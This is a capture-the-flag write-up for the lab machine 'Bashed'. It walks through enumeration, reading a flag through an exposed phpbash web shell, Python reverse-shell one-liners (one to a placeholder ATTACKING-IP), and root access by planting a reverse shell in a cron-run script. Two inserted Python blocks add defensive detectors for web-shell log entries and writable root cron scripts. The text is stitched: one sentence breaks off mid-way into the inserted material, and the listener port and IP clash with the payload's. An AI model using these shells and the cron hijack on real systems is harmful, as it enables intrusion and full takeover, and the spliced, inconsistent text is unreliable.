# Enumeration
## NMAP
Port 80 is open, running Apache httpd 2.4.18 on Ubuntu.
```
# nmap -A 10.10.10.68
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-08 03:14 EDT
Nmap scan report for 10.10.10.68
Host is up (0.050s latency).
Not shown: 999 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Arrexel's Development Site
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
```
```
Network Distance: 2 hops
TRACEROUTE (using port 5900/tcp)
HOP RTT      ADDRESS
1   50.56 ms 10.10.14.1
2   50.73 ms 10.10.10.68
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.14 seconds
```
## Let's see what this website is about.
## DirBuster report
It reveals a bunch of directories and files that are interesting:
```
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Thu Apr 08 03:25:09 EDT 2021
--------------------------------
http://10.10.10.68:80
--------------------------------
Directories found during testing:
Dirs found with a 200 response:
/
/css/
/dev/
/images/
/js/
/demo-images/
/php/
/uploads/
Dirs found with a 403 response:
/icons/
/icons/small/
--------------------------------
Files found during testing:
Files found with a 200 responce:
/dev/phpbash.min.php
/index.html
/single.html
/css/carouFredSel.css
/css/clear.css
/dev/phpbash.php
/css/common.css
/css/font-awesome.min.css
/css/sm-clean.css
/js/jquery.js
/js/imagesloaded.pkgd.js
/js/jquery.nicescroll.min.js
/js/jquery.smartmenus.min.js
/js/jquery.carouFredSel-6.0.0-packed.js
/js/jquery.mousewheel.min.js
/js/jquery.touchSwipe.min.js
/js/jquery.easing.1.3.js
/js/main.js
/js/custom_google_map_style.js
/js/html5.js
/config.php
/php/sendMail.php
--------------------------------
```
The site's developer boasts about a phpbash file he put on the platform. Let's use it to get a foothold.
# Burp Suite
I am going to try and see the contents of the discovered files.
## Request
The file runs bash commands on the web server itself. Let's cat our flags 🙂
```
POST /dev/phpbash.min.php/ HTTP/1.1
Host: 10.10.10.68
Content-Length: 41
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.150 Safari/537.36
Content-type: application/x-www-form-urlencoded
Accept: */*
Origin: http://10.10.10.68
Referer: http://10.10.10.68/dev/phpbash.min.php/
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

cmd=cd /home/arrexel;pwd;ls;cat user.txt;
```
## Response
user flag: 2c281f318555dbc1b856957c7147bfc1
```
HTTP/1.1 200 OK
Date: Thu, 08 Apr 2021 08:02:27 GMT
Server: Apache/2.4.18 (Ubuntu)
Content-Length: 56
Connection: close
Content-Type: text/html; charset=UTF-8

/home/arrexel
user.txt
2c281f318555dbc1b856957c7147bfc1
```
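From the defender's side, the only trace this web shell leaves in a default Apache access log is the request line (the `cmd=` body is not logged). The following is an added example, not part of the writeup or of phpbash, that scans combined-format log lines for the signs visible above: a known shell name, PHP served from content directories such as `/dev/` or `/uploads/`, and the trailing `.php/` path-info form used in the request. The sample log lines are constructed to match the box.

```python
import re

# Constructed Apache combined-format lines: normal traffic plus the
# web-shell call from the request above (only the URI is logged).
SAMPLE_LOG = """\
10.10.14.24 - - [08/Apr/2021:08:01:10 +0000] "GET /index.html HTTP/1.1" 200 7743 "-" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:08:01:12 +0000] "GET /css/common.css HTTP/1.1" 200 1021 "-" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:08:02:27 +0000] "POST /dev/phpbash.min.php/ HTTP/1.1" 200 56 "http://10.10.10.68/dev/phpbash.min.php/" "Mozilla/5.0"
10.10.14.24 - - [08/Apr/2021:08:03:01 +0000] "GET /php/sendMail.php HTTP/1.1" 200 12 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Directories DirBuster found on this box that should never execute PHP,
# plus the file name of the shell found under /dev/.
CONTENT_DIRS = ("/dev/", "/uploads/", "/images/", "/demo-images/")
SHELL_NAMES = ("phpbash",)

def classify(method, target):
    """Return the list of reasons a request looks like web-shell use (empty if clean)."""
    path = target.split("?", 1)[0].lower()
    reasons = []
    if any(name in path for name in SHELL_NAMES):
        reasons.append("known web shell name")
    if ".php/" in path:
        # PHP handler invoked with trailing PATH_INFO, as in the request above
        reasons.append("php with trailing path info")
    if path.startswith(CONTENT_DIRS) and ".php" in path:
        reasons.append("php executed from a content/dev directory")
    if method == "POST" and reasons:
        reasons.append("POST to suspicious php")
    return reasons

def find_webshell_hits(log_text):
    """Parse combined-format lines and return (ip, target, status, reasons) for hits."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        reasons = classify(m["method"], m["target"])
        if reasons:
            hits.append((m["ip"], m["target"], m["status"], reasons))
    return hits

if __name__ == "__main__":
    for hit in find_webshell_hits(SAMPLE_LOG):
        print(hit)
```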
### Let's see how we can escalate our privileges and gain root.
Firstly, get a reverse shell:
1. Change ATTACKING-IP (and the port, 80 here) to your own listener:
```
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
```
### Let's upgrade our shell, so that it is more usable:
1. Spawn a better shell: `python3 -c 'import pty;pty.spawn("/bin/bash")'`
2. Get access to terminal commands: `export TERM=xterm`
3. Background the shell with Ctrl+Z, then turn on autocomplete etc. by typing in the original terminal: `stty raw -echo; fg`
# Privilege Esc.
* Ran linenum.sh locally, but nothing really was of interest.
* Looked for SGID/SUID files.
* Finally, looking into sudoers I received the following output:
```
$ sudo -l
Matching Defaults entries for www-data on bashed:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on bashed:
    (scriptmanager : scriptmanager) NOPASSWD: ALL
```
So we (www-data) can run any command as user scriptmanager, and no password is required:
```
$ sudo -u scriptmanager whoami
scriptmanager
```
To become user *scriptmanager* we type in:
```
sudo -u scriptmanager bash -i
```
Let's enumerate further. What does this user own or have access to?
```
scriptmanager@bashed:/$ find / -type f -user scriptmanager 2>/dev/null
/scripts/test.py
/home/scriptmanager/.profile
/home/scriptmanager/.bashrc
/home/scriptmanager/.selected_editor
/home/scriptmanager/.bash_history
/home/scriptmanager/.bash_logout
```
Besides its home directory, it owns /scripts/test.py:
```
scriptmanager@bashed:/scripts$ cat test.py
f = open("test.txt", "w")
f.write("testing 123!")
f.close
```
It opens test.txt and writes a string into it, hmm. Who owns test.txt?
```
scriptmanager@bashed:/scripts$ ll
total 16
drwxrwxr-- 2 scriptmanager scriptmanager 4096 Apr 8 03:19 ./
drwxr-xr-x 23 root          root          4096 Dec 4  2017 ../
-rw-r--r-- 1 scriptmanager scriptmanager  282 Apr 8 03:19 test.py
-rw-r--r-- 1 root          root            12 Apr 8 03:03 test.txt
```
test.txt is owned by root even though test.py (which creates it) is owned by scriptmanager, so test.py is evidently being executed as root, most likely by a cron job. Anything we put into test.py will therefore run as root. Let's add sauce: [python reverse shell](http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet)
```
scriptmanager@bashed:/scripts$ cat test.py
import socket,subprocess,os
f = open("test.txt", "w")
f.write("change 123!")
f.close()
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.6",4444))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
p=subprocess.call(["/bin/sh","-i"])
```
It writes out the
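The root cause here is a root cron job executing a script that a non-root user owns. The following is an added example, not part of the writeup, that audits /etc/crontab-format entries for exactly that condition: root jobs whose absolute-path arguments (the script, its directory) are owned or writable by someone other than root. The crontab text and the stand-in for os.stat are constructed to mirror the /scripts layout shown above; uid 1001 is an assumed uid for scriptmanager.

```python
import os
import shlex
import stat
from types import SimpleNamespace

# Constructed sample crontab: one normal root job and one mirroring the box,
# where root runs a script that lives in a directory owned by scriptmanager.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *  * * * root    cd / && run-parts --report /etc/cron.hourly
*  *  * * * root    python /scripts/test.py
"""

# Constructed stand-in for os.stat modelled on the `ll` output above:
# path -> (mode, uid). uid 0 is root; 1001 is an assumed uid for scriptmanager.
FAKE_FS = {
    "/": (0o40755, 0), "/etc": (0o40755, 0), "/etc/cron.hourly": (0o40755, 0),
    "/scripts": (0o40774, 1001), "/scripts/test.py": (0o100644, 1001),
}

def fake_stat(path):
    mode, uid = FAKE_FS[path]  # KeyError for unknown paths, like a missing file
    return SimpleNamespace(st_mode=mode, st_uid=uid)

def parse_system_crontab(text):
    """Yield (user, argv) for each job line in /etc/crontab format."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment or VAR=value line
        fields = line.split(None, 6)  # m h dom mon dow user command
        if len(fields) == 7:
            yield fields[5], shlex.split(fields[6])

def writable_by_non_root(path, stat_fn):
    """True if the file or its parent directory is owned or writable by a non-root user."""
    try:
        entries = (stat_fn(path), stat_fn(os.path.dirname(path) or "/"))
    except (OSError, KeyError):
        return False  # cannot stat it; out of scope for this check
    loose = stat.S_IWGRP | stat.S_IWOTH
    return any(e.st_uid != 0 or e.st_mode & loose for e in entries)

def audit(text, stat_fn=os.stat):
    """Return absolute paths that root cron jobs execute but a non-root user can change."""
    findings = []
    for user, argv in parse_system_crontab(text):
        if user == "root":
            findings += [a for a in argv if a.startswith("/") and writable_by_non_root(a, stat_fn)]
    return findings

if __name__ == "__main__":
    print(audit(SAMPLE_CRONTAB, fake_stat))
```

Run against the real system by calling `audit(open("/etc/crontab").read())`, which uses os.stat; the same logic applies to files under /etc/cron.d.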
### pwn
```
# nc -lnvp 1337
listening on [any] 1337 ...
connect to [10.10.14.24] from (UNKNOWN) [10.10.10.68] 50176
/bin/sh: 0: can't access tty; job control turned off
# whoami
root
# cat /root/root.txt
```